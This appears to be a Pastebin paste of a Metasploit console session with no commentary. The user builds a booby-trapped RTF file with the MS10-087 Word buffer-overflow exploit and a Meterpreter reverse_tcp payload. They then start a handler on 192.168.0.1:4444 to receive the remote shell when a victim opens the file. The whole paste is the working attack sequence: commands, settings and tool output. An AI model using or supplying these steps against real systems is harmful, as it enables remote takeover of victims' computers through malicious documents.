Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
- msf exploit(ms10_087_rtf_pfragments_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- msf exploit(ms10_087_rtf_pfragments_bof) > set LHOST 192.168.0.1
- LHOST => 192.168.0.1
- msf exploit(ms10_087_rtf_pfragments_bof) > exploit
- [*] Creating 'msf.rtf' file ...
- [*] Generated output file /opt/metasploit3/msf3/data/exploits/msf.rtf
- msf exploit(ms10_087_rtf_pfragments_bof) > use exploit/multi/handler
- msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 192.168.0.1
- LHOST => 192.168.0.1
- msf exploit(handler) > set LHOST 4444
- LHOST => 4444
- msf exploit(handler) > set LPORT 4444
- LPORT => 4444
- msf exploit(handler) > set LHOST 192.168.0.1
- LHOST => 192.168.0.1
- msf exploit(handler) > exploit
- [*] Started reverse handler on 192.168.0.1:4444
- [*] Starting the payload handler...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement